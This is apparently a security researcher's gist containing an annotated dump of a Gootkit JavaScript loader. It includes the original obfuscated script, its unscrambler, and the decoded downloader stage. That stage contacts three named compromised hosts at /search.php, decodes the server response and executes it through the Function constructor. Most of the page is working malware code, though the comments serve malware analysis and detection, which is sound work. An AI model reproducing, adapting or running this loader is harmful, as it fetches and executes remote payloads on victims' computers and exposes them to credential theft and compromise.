@malwarezone
Last active November 29, 2020 18:44
Gootkit JS
// Analyst dump of the decoded first stage. The leading "constructor," is not script
// text: it appears to be the preceding array element of the dump (jJ59 uses
// HI34[pb56] as a property name on cV52) — confirm against the raw decode.
constructor, sjhi = 2270;
// WScript.Sleep pauses for 1015 ms; the block below runs when the call's return
// value is falsy.
if (!WScript["sleep"](1015)) {
DR97 = (WScript)["CreateObject"]("WScript.Shell");
// Host indicator: the sample reads, and if absent creates, this per-user registry key.
tv45 = "HKEY_CURRENT_USER\\SOFTWARE\\sRVkOK\\";
try {
DR97["RegRead"](tv45);
} catch (e) {
// RegRead threw (presumably because the key is missing): write an empty REG_SZ
// default value and set ey30.
DR97["RegWrite"](tv45, "", "REG_SZ");
ey30 = 90;
}
// NOTE(review): ey30 is only assigned in the catch branch above. If the key already
// exists, this read of an unassigned name would throw and stop the script — this
// looks like a run-once marker; confirm.
lBLLs = ey30;
EH70 = "VnXNuCz";
// Appends the integers 67..138551 to EH70 and discards each indexOf result.
// Nothing in the loop uses the search result; presumably a time-burning delay.
for (US59 = 67; US59 < 138552; US59++) {
EH70 = EH70 + US59;
EH70.indexOf("GkmX");
}
}
// Second layer: jf61 unscrambles the string literal, HI34[3] turns the resulting text
// into a callable, and that callable is invoked with EH70 as its argument.
// HI34[3] is whatever jJ59 stored from cV52[HI34[pb56]]; the dump below prints it as
// the native Function constructor, so this is dynamic execution of decoded text.
// The readable form of this literal appears to be the listing that starts with
// `BE79 = [...]` further down the page. For analysis, decode the literal offline
// rather than letting the script host run this line.
HI34[3](jf61('qwegmmonsr?k\"c+=\'\"p+hCpD.8h3c,r afeasl/s\'e+)];4 8LSNn2[69.7sEeBn+d\'(/)/;: s}pctatthc\'h (,e\')T{E Gr\'e(tnuerpno .f6a2lNsLe ;{ y}r ti f} ;(\"L6N42168.7s2t\"a+t3u8sD C===3=8 D2C0{0 )) \"{% NvIaArM OBDxS4N9D R=E SLUN%2\"6 .=r!e s)p\"o%nNsIeATMeOxDtS;N DiRfE S(U(%B\"x(4s9g.niinrdteSxtOnfe(m\"n@o\"r+iCvDn8E3d+n\"a@p\"x,E .0))\")l=l=e-h1S). t{p iWrSccSrWi\"p(tt.cseljebeOpe(t2a2e2r2C2.)t;p i}r ceSlWs(e f{i B;x)4093 +=0 7B,x24(9].\"rretpslbaucse\"([\")@(\"g+nCiDr8t3S+o\"t@.\"),(\"m\"o)d;n avra.rh taaCM1 == 3B8xD4C9 .;r)e\'pPlTaTcHeL(M/X(r\\edv{r2e}S)./2gL,M XfSuMn\'c(tticoenj b(OyeRt8a6e)r C{. trpeitrucrSnW S=t r6i2nNgL. f{r o)m3C h<a r4C8oSdne(( pealrishewI n;t0( y=R 8468,S1n0 );+]3\"0y)c;. g}r)o;. aHnIo3l4a[.3w]w(wa\"C,1\")m(o)c;. nWiStcrraimpttn.iQausiotr(e)p;a .}w w}w \"e,l\"seed .{g rWuSbcnreilplti.ds-lneoetpn(i2m2d2a2b2.)w;w w}\" [n S=8 49+7+E;B}'))(EH70);
// Last statement of the decoded first stage: keeps a second reference to HI34.
// The trailing ", ," and the `function Function() { [native code] }` text are not
// script source. They look like the remaining elements of the printed HI34 array
// (an empty element, then the native Function constructor that jJ59 stores at
// HI34[Ru83]) — confirm against the raw decode.
uukzr = HI34;, ,
function Function() {
[native code]
}
// Decoded downloader stage. This text is a function body (note the bare `return`
// below), consistent with it being passed through HI34[3] rather than run as a script.
// Network indicators from this sample: the three host names contacted over HTTPS.
BE79 = ["www.badminton-dillenburg.de", "www.aperosaintmartin.com", "www.alona.org.cy"];
nS84 = 0;
// One attempt per host, in list order.
while (nS84 < 3) {
LN26 = WScript.CreateObject('MSXML2.ServerXMLHTTP');
// Per-request token: up to 100 characters of Math.random()'s decimal string, starting
// at index 2 (after the leading "0.").
CD83 = Math.random().toString()["substr"](2, 70 + 30);
// ExpandEnvironmentStrings returns its input unchanged when the variable is not
// defined, so this branch runs only when %USERDNSDOMAIN% is set (usually a
// domain-joined host). The "278146" suffix marks that condition in the request.
if (WScript.CreateObject("WScript.Shell").ExpandEnvironmentStrings("%USERDNSDOMAIN%") != "%USERDNSDOMAIN%") {
CD83 = CD83 + "278146";
}
try {
// Synchronous GET (third argument false). Detection hook: a script host process
// requesting /search.php with the query parameter `someqwgmnrkc` and a digit string.
LN26.open('GET', 'https://' + BE79[nS84] + '/search.php' + "?someqwgmnrkc=" + CD83, false);
LN26.send();
} catch (e) {
// Any request error ends the whole function; the remaining hosts are not tried.
return false;
}
if (LN26.status === 200) {
var Bx49 = LN26.responseText;
// The body is accepted only if it echoes the token wrapped in "@" characters.
if ((Bx49.indexOf("@" + CD83 + "@", 0)) == -1) {
WScript.sleep(22222);
} else {
// Drop the first "@token@" marker, then map every two-digit group to the
// character whose code is that number plus 30.
Bx49 = Bx49.replace("@" + CD83 + "@", "");
var aC1 = Bx49.replace(/(\d{2})/g, function(yR86) {
return String.fromCharCode(parseInt(yR86, 10) + 30);
});
// Server-supplied text is turned into code by HI34[3] and run, then the host exits.
// The next stage lives only in the HTTP response and is not present on this page.
HI34[3](aC1)();
WScript.Quit();
}
} else {
// Non-200 status: wait 22222 ms before moving on to the next host.
WScript.sleep(22222);
}
nS84++;
}
// Start of the original obfuscated script. Function declarations are hoisted, so
// cV52 can be called before its definition. cV52 declares one parameter, so 906 is
// ignored; the call sets pb56 = 0 and loads the scrambled text into CN43.
cV52(0, 906);
/**
 * Unscrambles CN43 with jf61 and splits the result on the separator VO94,
 * storing the pieces in the global HI34. Takes no parameters; arguments passed
 * by callers are ignored.
 */
function Ao68() {
HI34 = jf61(CN43).split(VO94);
}
// hH21 declares one parameter, so "RNXjd" is ignored. With SV64 = 1 the call sets
// SC11 = 1, Ru83 = 3 and qg48 = 2195.
hH21(1, "RNXjd");
/**
 * Thin wrapper around String.prototype.charAt.
 * @param qz50 string to read from
 * @param Cx53 character index
 * @returns the character at Cx53
 */
function Ws75(qz50, Cx53) {
return qz50.charAt(Cx53);
}
// Separator that Ao68 uses to split the unscrambled text into the HI34 array.
VO94 = "NVppV";
/**
 * Looks up a property on the cV52 function object, named by HI34[pb56], and stores
 * it at HI34[Ru83]. With the values set by the visible calls (pb56 = 0, Ru83 = 3)
 * and the dump at the top of the page showing "constructor" as the first element,
 * this would place the Function constructor in HI34[3] — confirm against the decode.
 * The indirection keeps the word "Function" out of the script text.
 */
function jJ59() {
HI34[Ru83] = cV52[HI34[pb56]];
}
/**
 * Loads the scrambled payload text into the global CN43 and records the start
 * index for the unscrambler in the global pb56.
 * @param Gg42 value copied to pb56 (jf61 starts reading at this index)
 */
function cV52(Gg42) {
// Scrambled payload text; jf61 restores its character order. Keep byte-identical
// when extracting or hashing the sample.
CN43 = '(\\;\" L}6fN 4i2t1 6r8}.y7 s{2;t \\e\"Las+Ntl32ua86sfD. Co=n=p=r3e=u8n tD(2eC\'0\\{r0G )E){ T\\)\"\'{\\%e ,N(v Iha\'A\\rcMh tOtBaDtxcSp4}Ns9 D: ;R/=)E/ (S\'L\\UdN+%n2B\\e\"E6s 7..=9r6![e2 nsN)SpL\\8\" o4%;n]N)s+Iee\'A\\TsM/elOsxaDetfSa; Nr ,Dci3Rhf8E. DSp(CUh(+%pB\"\\\\\"\'x\\(=4+sc9\"g\\.kn?irisnnrodmtmegSexwtqO\'n(f1e6(fmj\\(\"]n8@2o-\\1\"3r[+4i3CIvHD}n 8}E;3)d\"+Xnm\\k\"Ga\"@(pf\\O\"xxe,dEn i..00)7)H\\E\";)9l5=SlU=+e0-7hH1ES=)0.7 HtE{{p) +i+W9r5SScUc S;r2W5i5\\8\"3p1( t<t .9c5sSeUl;j7e6b e=O p9e5(StU2(a 2reo2fr;2\"Cz2C.u)NtX;npV \"i }=r 0c7eHSEl;W0s3(yee = sfL{LiB l B};;x0)94=00933y e+ =;0) \"7\"B+,]x[2+4\"(Z9\"]+.]\\[\"+r\"rSe\"t+p]s[l+b\"a_u\"c+s]e[\\+\"\"(G[\"\\+\"])[@+(\"\\E\"\"g++]n[C+i\"DRr\"8 t,3\"S\"+ o,\\5\"4tv@t.(\\]\"\")e,\"(+\\]\"[m+\\\"\"toi)\"d+;]n[ +a\"vrr\"a+.]r[h+ \"tWagaeCRM\"1[ 7 9=R=D {3 B)8ex(Dh4cCt9a c. ;}r );e)\\5\'4pvPtl(T]a\"TdcaH\"e+L]([M+/\"Xe(Rrg\\e\\Re\"d[v7{9rR2De }{S )y.r/t2;g\"L\\,\\MK OXkfVSRusM\\n\\\\\"\'+c\"(\"t+t]i[c+o\"eEn\"j+ ]b[(+O\"yRe\"R+t]8[a+6\"eA)\"r+ ]C[{+.\" Wt\"r+p]e[i+t\"rTuFc\"r+S]n[W+ \" OS\"=+t] [r+6\"iS2\"n+N\"g\\L\\.\" +f\"{\"r+ ]o[)+m\"3RCE ShU<\"a+ ]r[4+C\"8_o\"S+d]n[e+(\"(T \"p+e]a[l+r\"iNsEh\"e+w]I[ +n\";RtR0U(\" +y]=[R+ \"8C4_6Y8E,KS\"1+n]0[ +)\";H+\"] 3=\\ \"504yv)tc ;;.) \"g\"}+r])[o+;\".l laeH\"n+I]o[3+l\"4haS[..\"3+w]][w+(\"wta\"\\+\"]C[,+1\"\\p\"i)\"m+(]o[)+c\";r.c Sn\"W+i]S[t+c\"rWr\"a(i]m\"p\"t+t]n[.+i\"Qtacues\"i+o]t[r+(\"ej)bpO;\"a+ ].[}+w\" ewt}aw\" +\\]\"[e+,\"le\\r\"\"s+e]e[d+ \".C{\"g[ )rtWpuiSrbccSnWr(e i=l p7l9tRiD. d{s -)l)n5e1o0e1t(p]n\"(pie2em\"2+d]2[a+2\"bl2\".+)]w[;+w\" sw\"}[\\t\"p i[rnc SSW= 8! (4 9f+i7;+0E7;2B2}=\'i)h)j(sEVHp7p0V)N;ruoutkczurr=tHsIn3o4c;';
pb56 = Gg42;
}
/**
 * Returns fK3795 modulo twice the global SC11. With SC11 = 1 (set by the visible
 * hH21(1, ...) call) this is a parity test: non-zero for odd indices, 0 for even.
 * @param fK3795 index being classified
 */
function XE58(fK3795) {
return fK3795 % (SC11 + SC11);
}
/**
 * Execution point of the loader: calls HI34[Ru83] with HI34[SC11] as its argument,
 * then immediately invokes the returned value, again passing HI34[SC11].
 * With HI34[Ru83] populated by jJ59, this runs the decoded text as code. When
 * analysing the sample, stop before this call and inspect HI34 instead.
 */
function Hx28() {
HI34[Ru83](HI34[SC11])(HI34[SC11]);
}
/**
 * Returns PB59 + uV55. jf61 calls it with strings, so it acts as concatenation
 * there; the third argument jf61 passes is ignored.
 */
function AU60(PB59, uV55) {
return PB59 + uV55;
}
/**
 * String unscrambler used for both payload layers.
 * Walks indices pb56 .. qg48 - 1 of cf50. A character whose index makes XE58
 * return non-zero is appended to the result; otherwise it is prepended.
 * With the visible settings (pb56 = 0, SC11 = 1, qg48 = 2195) odd-indexed
 * characters form the tail in order and even-indexed ones form the head in reverse.
 * The upper bound is the global qg48, not cf50.length; charAt returns "" past the
 * end of the string, so shorter inputs are unaffected.
 * @param cf50 scrambled text
 * @returns the reordered text
 */
function jf61(cf50) {
// tN38, vy51 and jB7462 are assigned without declarations, so they are globals.
tN38 = ('');
vy51 = pb56;
while (vy51 < qg48) {
// Ws75 declares two parameters; the repeated third and fourth arguments are ignored.
jB7462 = Ws75(cf50, vy51, cf50, vy51);
// AU60 declares two parameters; the third argument in each call is ignored.
if (XE58(vy51)) tN38 = AU60(tN38, jB7462, tN38);
else tN38 = AU60(jB7462, tN38, jB7462);
vy51++;
}
return tN38;
}
// Neither function declares parameters, so 146 and 569 are ignored.
// Ao68 fills HI34 from the unscrambled text; jJ59 then stores cV52[HI34[pb56]]
// at HI34[Ru83].
Ao68(146);
jJ59(569);
/**
 * Sets the numeric globals the other functions rely on.
 * @param SV64 seed; SC11 is set to it and Ru83 to SC11 + SV64 * SC11 + SV64
 *             (3 when SV64 is 1)
 */
function hH21(SV64) {
SC11 = SV64;
Ru83 = SC11 + SV64 * SC11 + SV64;
// Fixed upper bound for jf61's index walk.
qg48 = 2195;
}
// Hx28 takes no parameters, so 36 is ignored. This call runs the decoded first stage.
Hx28(36);